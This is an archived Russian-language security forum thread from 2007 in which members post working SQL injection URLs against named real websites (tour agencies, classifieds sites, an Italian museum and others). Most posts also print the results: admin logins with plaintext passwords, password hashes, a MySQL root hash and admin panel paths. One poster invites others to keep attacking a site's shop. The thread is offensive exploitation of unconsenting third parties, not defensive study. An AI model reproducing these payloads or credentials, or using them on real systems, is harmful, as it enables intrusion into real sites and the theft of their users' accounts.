ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3691  
Старый 14.11.2007, 02:49
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

А вот еще одни нубы )) надо ж так у админа пасс 1234 был :
http://www.apollo-tour.ru/



Цитата:
_http://www.apollo-tour.ru/news.php?id=-3+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6+from+users
admin:1234
админка как обычно : http://www.apollo-tour.ru/admin/index.php
 
Ответить с цитированием

  #3692  
Старый 14.11.2007, 02:51
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Прошу прощения за рекламу =\ сразу неподумал
 
Ответить с цитированием

  #3693  
Старый 14.11.2007, 02:52
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://michaelyoun.com/index.php?id=335+union+select+1,concat(login,0x7c,pass),3,4,5,concat_ws(0x2F,version(),user(),database())+from+users+limit+3,3//*
Version : 4.0.17-standard/michael132576@bfb1.hotchilli.net/michael132576

login | Password

Julien | $hAiaSOWw$L.ElrCaZddSXNbczXLln..

neel | $NT1HKLs6$maKjAm5gOFUdNwVnPKDed0

david | $CkfkJS1m$R0Wm0U9U.SewH1gZPqYOS.

marcoa | $zRtxrrzF$x9QdtdsEoDw47todoerT30

DavidHill | $/jrBGNbU$lneMqAV.Nwsk8bYXxsqLb.

Pascal | $tUYKyzOrNMdHIM2AsIYpf9ZnvgYc0

francoisadmin | $GaZJk4Aq$lGLp3Qc7ah45PioM9Mknl/

aroustan | $WXSFA3Ry$H2sDLkEXsCKHpXYIO9hnV/

jcharron | {left}NGNegUI$o4Uub83kCAKzLHetW7UBp.

roussot | $K1e9J0lz$A8trNdKNnQQwyrsNIJy7N.

Последний раз редактировалось K1nD[e]R; 14.11.2007 в 02:56..
 
Ответить с цитированием

  #3694  
Старый 14.11.2007, 02:56
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Цитата:
Сообщение от b3  
Прошу прощения за рекламу =\ сразу неподумал
Так удали...тут скрины не надо выставлять...если каждый будет скрин кидать хрен пойми что получится.


Код HTML:
http://www.thaitrademe.com/classifieds/product_desc.php?id=-4871+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
БД 5

Код HTML:
http://www.classifiedbiz.com/product_desc.php?id=4635+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
4 бд

Код HTML:
http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(admin_name,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauctions_admin/*
Код HTML:
http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(username,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauctions_members/*
БД 5

Последний раз редактировалось KEHT33; 14.11.2007 в 03:18..
 
Ответить с цитированием

  #3695  
Старый 14.11.2007, 03:46
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://ukrfoto.dp.ua/download.php?id=-166+union+select+1,concat_ws(0x2F,user(),version(),database()),3,4,5,6/*
ukrfoto@saturn/4.1.22-log/ukrfoto 3
 
Ответить с цитированием

  #3696  
Старый 14.11.2007, 04:23
-MoLoToK-
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171

Репутация: 88
Отправить сообщение для -MoLoToK- с помощью ICQ
По умолчанию

Код:
http://www.heroesworld.ru/files.php?section=9999999'+union+select+1,concat_ws(0x2F,user(),version()%20%20,database())/*
heroesv_bdu@localhost/4.1.20/heroesv_main
Работает только с 9999999.

Последний раз редактировалось -MoLoToK-; 14.11.2007 в 04:40..
 
Ответить с цитированием

  #3697  
Старый 14.11.2007, 07:43
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Агентство недвижимости «ИНСАЙД НОРД ВЕСТ»

Код:
http://www.i-nw.ru/news.php?id=9999+union+select+1,version(),3,4,concat(login,char(58),password),6,7+from+users/*
Version 4.1.20-log/dbu_insidenw_1@192.168.5.21/db_insidenw_1

Admins

secretar:123
luoman:12345
fin:f2inw
 
Ответить с цитированием

  #3698  
Старый 14.11.2007, 08:05
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.roguegovernment.com/news.php?id=-4682+union+select+1,version(),aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x3a),0x3a),4,5,6+from+mysql.user/*
Version root@localhost/4.1.7/roguegovernment

Admins:

root:6aee13f5467031e6
 
Ответить с цитированием

  #3699  
Старый 14.11.2007, 08:16
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.pro-tour.ru/news.php?id=772+union+select+1,concat_ws(0x2F,user(),version(),database()),3,4,5,6,7/*
protour@19
----------------------------------------------------------------------------------------------------------

Код:
http://www.clarionrus.ru/news.php?id=-51+union+select+1,2,3,concat_ws(0x2F,version(),user(),database()),5,6/*
4.1.20-lk-log/clarionrus@localhost/clarionrus

Последний раз редактировалось K1nD[e]R; 14.11.2007 в 08:22..
 
Ответить с цитированием

  #3700  
Старый 14.11.2007, 09:05
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

triennale.it
Код:
http://www.triennale.it/index.php?lang=_eng&id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,version(),database(),user()),43,44,45,46,47,48,49,50/*
55 таблиц:
Код:
http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name,43,44,45,46,47,48,49,50+from+information_schema.tables+limit+54,1/*
Насколько я понял, таблица админов - utenti_gestionale:
Код:
http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,id_utente,password),43,44,45,46,47,48,49,50+from+utenti_gestionale+limit+0,1/*
Её поля:
Код:
id_utente
password
grado
Админов трое "логин:пасс":
Код:
triennale:Triennale_6
biglietteria:TrMilano
biglietteriaTBVS:TBVS_
На сайте есть SHOP, кому интересно - ковыряйте дальше (я с итальянским как-то не дружу!).
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 12 (пользователей: 0 , гостей: 12)
 


Быстрый переход




ANTICHAT.XYZ